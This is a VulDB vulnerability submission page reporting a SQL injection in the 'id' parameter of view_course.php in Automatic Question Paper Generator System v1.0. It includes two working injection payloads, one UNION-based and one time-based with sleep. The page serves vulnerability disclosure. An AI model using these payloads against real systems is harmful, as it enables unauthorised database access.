Submit #102701: Automatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerabilityinfo

TitelAutomatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerability
BeschreibungAn issue was discovered in Automatic Question Paper Generator System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /aqpg/admin/courses/view_course.php?id. Payload1:id=1' union all select null,null,concat(0x75767778,0x45464748),null,null,null,null,null-- - Payload2:id=1' and (select 6 from (select(sleep(20)))d)-- e
Quelle⚠️ https://github.com/SecurityYH/bug_report/blob/main/SQLi-1.md
Benutzer
 Evan (UID 43177)
Einreichung17.03.2023 06:23 (vor 3 Jahren)
Moderieren17.03.2023 07:23 (1 hour later)
StatusAkzeptiert
VulDB Eintrag223285 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_course.php ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Want to stay up to date on a daily basis?

Enable the mail alert feature now!